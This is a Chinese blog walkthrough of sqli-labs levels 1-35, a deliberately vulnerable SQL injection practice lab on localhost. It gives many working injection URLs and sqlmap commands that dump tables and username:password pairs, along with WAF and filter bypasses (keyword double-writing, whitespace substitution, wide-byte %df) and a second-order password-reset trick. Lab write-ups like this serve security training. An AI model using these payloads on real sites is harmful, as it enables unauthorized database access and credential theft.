码迷,mamicode.com
首页 > 数据库 > 详细

sqli-labs Less(1-35) 小结

时间:2017-10-02 14:28:18      阅读:353      评论:0      收藏:0      [点我收藏+]

标签:脚本   注册   判断   密码   for   输入参数   read   mit   5.0   

首先附上工具:

phpstudy2016:链接:http://pan.baidu.com/s/1bpbEBCj 密码:fmr4

sqli-labs-master:链接:http://pan.baidu.com/s/1jH4WlMY 密码:11mj

环境搭建之前写过,这里就不多说了,直接开始通关体验

所有实验均是拿当前数据库为例进行,即database()...

第一题说明了注入的初步判断及闭合,后续就不一一说明了......

一、http://127.0.0.1/sqli-labs-master/Less-1/?id=1

第一种方法:手工UNION联合查询注入

输入单引号,结果如下图所示:

 技术分享

根据报错信息,可以确定输入参数的内容被存放到一对单引号中间,脑补一下咱们输入的1在数据库中出现的位置为:select ... from ... where id=’1’ ......,多余的步骤不多说了,直接开始爆数据吧。

爆表

http://127.0.0.1/sqli-labs-master/Less-1/?id=0‘ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

 技术分享

爆字段

http://127.0.0.1/sqli-labs-master/Less-1/?id=0%27%20union%20select%201,group_concat%28column_name%29,3%20from%20information_schema.columns%20where%20table_name=%27users%27%20--+

 技术分享

爆值

http://127.0.0.1/sqli-labs-master/Less-1/?id=0%27%20union%20select%201,group_concat%28username,0x3a,password%29,3%20from%20users%20--+

 技术分享

第二种方法:手工报错型注入

爆表

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20and%201=extractvalue%281,concat%280x7e,%28select%20group_concat%28table_name%29%20from%20information_schema.tables%20where%20table_schema=database%28%29%29%29%29%20--+

 技术分享

爆字段

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20and%201=extractvalue%281,concat%280x7e,%28select%20group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_name=%27users%27%29%29%29%20--+

 技术分享

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20and%201=extractvalue%281,concat%280x7e,%28select%20group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_name=%27users%27 and column_name not in (‘user_id‘,‘first_name‘,‘last_name‘,‘us‘)%29%29%29%20--+

 技术分享

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20and%201=extractvalue%281,concat%280x7e,%28select%20group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_name=%27users%27%20and%20column_name%20not%20in%20%28%27user_id%27,%27first_name%27,%27last_name%27,%27us%27,%27user%27,%27password%27,%27avatar%27,%27last_login%27%29%29%29%29%20--+

 技术分享

爆值

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20and%201=extractvalue%281,concat%280x7e,%28select%20group_concat%28username,0x3a,password%29%20from%20users%29%29%29--+

 技术分享

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20and%201=extractvalue%281,concat%280x7e,%28select%20group_concat%28username,0x3a,password%29%20from%20users%20where%20username%20not%20in%20%28%27Dumb%27,%27I-kill-you%27%29%29%29%29--+

 技术分享

步骤类似,就不重复做了

第三种方法: SQLMAP工具进行注入

本工具中使用-v 0参数只是为了更好的截图......

sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=1 --technique UE --dbms mysql –batch –v 0

 技术分享

sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=1 --technique UE --dbms mysql --dbs --batch -v 0

 技术分享

sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=1 --technique UE --dbms mysql -D security --tables  --batch -v 0

 技术分享

sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=1 --technique UE --dbms mysql -D security -T users --columns  --batch -v 0

 技术分享

sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=1 --technique UE --dbms mysql -D security -T users -C username,password --dump --batch -v 0

 技术分享

其它库、表、字段就不一一爆了,,,

二、http://127.0.0.1/sqli-labs-master/Less-2/?id=1

输入单引号,根据报错信息确定咱们输入的内容被原封不动的带入到数据库中,也可叫做数字型注入,把第一题中id=1后面的单引号去掉,其它保持不变就行了,不再重复了......

三、http://127.0.0.1/sqli-labs-master/Less-3/?id=1

输入单引号,根据报错信息确定咱们输入的内容存放到一对单引号加圆括号中了,脑补一下咱们输入1在数据库语句中的位置,形如select ... from ... where id=(‘1’) ...,在第一题中id=1‘的后面单引号加上),其它保持不变就行了,不再重复了......

四、http://127.0.0.1/sqli-labs-master/Less-4/?id=1

输入单引号,页面无任何变化,尝试输入双引号,页面报错,根据报错信息判断出咱们输入的内容被放到一队双引号和圆括号中,脑补一下:select ... from ... where id=(”1”) ...,把第一题中1后面的引号换成双引号加)就可以了......

五、http://127.0.0.1/sqli-labs-master/Less-5/?id=1

 技术分享

看到这个报错信息,第一反应就行布尔型盲注、报错型注入、时间延迟型盲注了,十有八九UNION联合查询型注入不能用了......

简单测试下,猜测都是对的,下面给出验证时间延迟型的盲注:

http://127.0.0.1/sqli-labs-master/Less-5/?id=1%27%20and%20sleep%285%29--+

报错注入,方法和第一题一样,都是单引号型的

布尔型和时间延迟型盲注建议采用sqlmap去跑吧......

 技术分享

六、http://127.0.0.1/sqli-labs-master/Less-6/?id=1

把上一题的单引号换成双引号即可......

七、http://127.0.0.1/sqli-labs-master/Less-7/?id=1

几次尝试,不难猜出注释符被过滤了......,直接输入http://127.0.0.1/sqli-labs-master/Less-7/?id=1%27%20and%20%271%27=%271

由报错信息不难看出报错型注入基本没戏的,直接布尔型盲注或者时间盲注,使用sqlmap跑,

sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-7/?id=1 --technique B --dbms mysql --batch -v 0

 技术分享

八、http://127.0.0.1/sqli-labs-master/Less-8/?id=1

输入内容被放到一对单引号中,注释符可用,构造payload:

http://127.0.0.1/sqli-labs-master/Less-8/?id=1%27%20and%201=1%20--+

http://127.0.0.1/sqli-labs-master/Less-8/?id=1%27%20and%202=1%20--+

判断出存在布尔型盲注,使用sqlmap跑,和第七题一样......

sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-8/?id=1 --technique B --dbms mysql --batch -v 0

 技术分享

九、http://127.0.0.1/sqli-labs-master/Less-9/?id=1

参数内容被放到一对单引号中,不用脑补了......注释符可用

简单判断下:http://127.0.0.1/sqli-labs-master/Less-9/?id=1%27%20and%20sleep(5)%20--+

页面响应延迟,判断存在时间延迟型注入,直接用sqlmap跑,

sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-9/?id=1 --technique T --dbms mysql --batch -v 0

 技术分享

十、http://127.0.0.1/sqli-labs-master/Less-10/?id=1

输入的参数内容即1被放到一对双引号中,注释符可用

http://127.0.0.1/sqli-labs-master/Less-10/?id=1%22%20and%20sleep(5)--+

页面响应延迟,存在时间延迟型注入,直接使用sqlmap跑,,,

此处需要修改一下前缀文件内容如下,修改xml文件夹下boundaries.xml文件中的内容如下图所示,,,

 技术分享

直接用sqlmap跑,

 技术分享

十一、       http://127.0.0.1/sqli-labs-master/Less-11/

11到21关的提交方式全是post型的,需要借助抓包工具,我这里使用burpsuite工具

Burpsuite抓包,简单测试下,存在报错型注入

uname=admin‘ and extractvalue(1,concat(0x7e,(select database()))) --+&passwd=admin&submit=Submit

 技术分享

直接sqlmap跑,,,,,,

 技术分享

再测试下,存在UNION联合查询注入,如下图所示,,

 技术分享

直接sqlmap跑,

 技术分享

十二、       http://127.0.0.1/sqli-labs-master/Less-12/

双引号,报错型

 技术分享

直接sqlmap跑,,,

sqlmap.py -r C:\Users\esafenet\AppData\Local\Temp\\1506657847007.req --technique E --dbms mysql --batch -v 0

 技术分享

十三、       http://127.0.0.1/sqli-labs-master/Less-13/

抓包测试注入类型,输入参数内容被放到(‘’)中,注释符可用,如下图所示,,

技术分享

直接使用sqlmap跑,

sqlmap.py -r C:\Users\esafenet\AppData\Local\Temp\\1506661582400.req --prefix "‘)" --technique E --dbms mysql --batch -v 0

 技术分享

十四、       http://127.0.0.1/sqli-labs-master/Less-14/

输入内容被放到双引号中,报错型注入,注释符不可用,如下图所示,,

 技术分享

使用sqlmap去跑,,,

sqlmap.py -r C:\Users\esafenet\AppData\Local\Temp\\1506662249280.req --technique E --dbms mysql --batch -v 0

 技术分享

十五、       http://127.0.0.1/sqli-labs-master/Less-15/

根据页面显示,可以测出为布尔和时间延迟的盲注,如下图所示

uname=admin‘ and 1=1 --+&passwd=admin&submit=Submit

 技术分享

uname=admin‘ and 1=2 --+&passwd=admin&submit=Submit

 技术分享

uname=admin‘ and sleep(5) --+&passwd=admin&submit=Submit

页面响应延迟,可以看出存在时间延迟性注入,

直接使用sqlmap跑,,

sqlmap.py -r C:\Users\esafenet\AppData\Local\Temp\\1506662373346.req --technique T --dbms mysql --batch -v 0 --threads 8

 技术分享

布尔型盲注存在点问题,使用sqlmap工具没有跑出来,,,只能通过手工去爆了,苦逼,,

十六、       http://127.0.0.1/sqli-labs-master/Less-16/

 技术分享

sqlmap.py -r C:\Users\esafenet\AppData\Local\Temp\\1506664390744.req -p "uname" --technique T --dbms mysql --batch --level 3 --threads 8 -v 0

 技术分享

十七、       http://127.0.0.1/sqli-labs-master/Less-17/

报错型注入,单引号,注释符可用

 技术分享

用sqlmap测试

sqlmap.py -r C:\Users\esafenet\AppData\Local\Temp\\1506754249224.req -p passwd --tech E --dbms mysql --batch -v 0

 技术分享

十八、       http://127.0.0.1/sqli-labs-master/Less-18/

报错型,单引号,user-agent型注入点,,,

 技术分享

直接用sqlmap跑,在http请求头的user-agent内容后面加上一个*号

sqlmap.py -r C:\Users\esafenet\AppData\Local\Temp\\1506757146400.req --user-agent Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36 --tech E --dbms mysql --batch -v 0

 技术分享

十九、       http://127.0.0.1/sqli-labs-master/Less-19/

报错型,单引号,referer型注入点,,

 技术分享

直接用sqlmap跑,在http请求头的referer内容后面加上一个*号,,

sqlmap.py -r C:\Users\esafenet\AppData\Local\Temp\\1506757627681.req --referer http://127.0.0.1/sqli-labs-master/Less-19/ --tech E --dbms mysql --batch -v 0

 技术分享

二十、       http://127.0.0.1/sqli-labs-master/Less-20/

报错型,单引号,cookie型注入

 技术分享

直接用sqlmap测试,,

sqlmap.py -r C:\Users\esafenet\AppData\Local\Temp\\1506758959558.req --cookie uname=admin --tech E --dbms mysql --batch -v 0

 技术分享

二十一、              http://127.0.0.1/sqli-labs-master/Less-21/

本关和20关相似,只是cookie的uname值经过base64编码了,使用sqlmap的时候直接带个脚本就行了,直接上sqlmap,,

sqlmap.py -r C:\Users\esafenet\AppData\Local\Temp\\1506759460951.req --cookie uname=YWRtaW4%3D --tech E --dbms mysql --tamper base64encode.py --batch -v 0

 技术分享

二十二、              http://127.0.0.1/sqli-labs-master/Less-22/

报错型,双引号,base64编码,,没改payloads等级的需要使用--level 3 参数

 技术分享

技术分享

直接上SQL map,,

sqlmap.py -r C:\Users\esafenet\AppData\Local\Temp\\1506760318956.req --cookie uname=YWRtaW4= --tech E --dbms mysql --tamper base64encode.py --batch -v 0

 技术分享

二十三、              http://127.0.0.1/sqli-labs-master/Less-23/

单引号,过滤了注释符,,直接上sqlmap吧,,

 技术分享

二十四、              http://127.0.0.1/sqli-labs-master/Less-24/?id=1

利用带有管理员账号的注册用户名,在修改密码的时候达到修改管理员账号密码的效果,,

注册用户名:admin’ or ‘1’=’1  密码为 admin

注册成功后,登录进去修改密码,将密码改为 123

更改后即可发现,admin用户的密码也被改成了123,

自行脑补一下,update tables set password=’123’ where username=’admin’ or ‘1’=’1’

二十五、              http://127.0.0.1/sqli-labs-master/Less-25/?id=1

过滤了and和or,绕过方法%26%26代替and,或者双写anandd来绕过,or用 || 或者oorr来代替即可绕过,,,话不多说,我这里直接修改脚本使用sqlmap来跑,,

And2anandd.py脚本内容如下所示,,

 技术分享

sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-25/?id=1 -p id --tech E --dbms mysql --tamper and2anandd.py --batch -v 0

 技术分享

二十六、              http://127.0.0.1/sqli-labs-master/Less-26/?id=1

此题过滤了所有空白字符,暂时未找到代替空格的字符,,,,,,欢迎大佬们分享^_^

二十七、              http://127.0.0.1/sqli-labs-master/Less-27/?id=1

union,select,空格,注释符被过滤,直接修改脚本结合sqlmap测试,使用%09,%0a等代替空格,双写代替select,,脚本和25题类似,,,直接用sqlmap测试,

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-27/?id=1 -p id --prefix "‘" --suffix "%0aand%0a‘1‘=‘1" --tech E --dbms mysql --tamper select2selecselectt.py,space2%0a.py --batch -v 0

 技术分享

二十八、              http://127.0.0.1/sqli-labs-master/Less-28/?id=1

http://127.0.0.1/sqli-labs-master/Less-28/?id=0%27)%0aunionunion%0aselect%0aselect%0a1,2,3%0aand%0a(%271%27=%271

直接用sqlmap跑,本题过滤了union+空格+select和空格,但是sqlmap中使用的是union+all+select,那我们只需用其它空白字符替换空格即可,,

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-28/?id=1 --prefix "‘)" --suffix "%0aand%0a(‘1‘=‘1" --tech U --dbms mysql --tamper space2%0a.py --batch -v 0

 技术分享

测试发现不存在报错型注入,,,

二十九、              http://127.0.0.1/sqli-labs-master/Less-29/?id=1

直接可以爆出,waf好像煤气作用,,

http://127.0.0.1/sqli-labs-master/Less-29/?id=0%27%20union%0aall%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()%20--+

 技术分享

直接用sqlmap测试

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-29/?id=1 --dbms mysql --batch -v 0

 技术分享

三十、       http://127.0.0.1/sqli-labs-master/Less-30/?id=1

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-30/?id=1 --dbms mysql --batch -v 0

 技术分享

三十一、              http://127.0.0.1/sqli-labs-master/Less-31/?id=1

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-31/?id=1 --dbms mysql --batch -v 0

 技术分享

三十二、              http://127.0.0.1/sqli-labs-master/Less-32/?id=1

 

http://127.0.0.1/sqli-labs-master/Less-32/?id=0%df%27%20union%20all%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+

技术分享

三十三、              http://127.0.0.1/sqli-labs-master/Less-33/

http://127.0.0.1/sqli-labs-master/Less-33/?id=0%df%27%20union%20all%20select%201,2,3--+

 技术分享

http://127.0.0.1/sqli-labs-master/Less-33/?id=0%df%27%20union%20all%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+

技术分享

 

三十四、              http://127.0.0.1/sqli-labs-master/Less-34/

burpsuite抓包,手工测试,,

 技术分享

三十五、              http://127.0.0.1/sqli-labs-master/Less-35

http://127.0.0.1/sqli-labs-master/Less-35/?id=0%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()

 技术分享

未完待续,,,,,,

 

sqli-labs Less(1-35) 小结

标签:脚本   注册   判断   密码   for   输入参数   read   mit   5.0   

原文地址:http://www.cnblogs.com/peterpan0707007/p/7620048.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!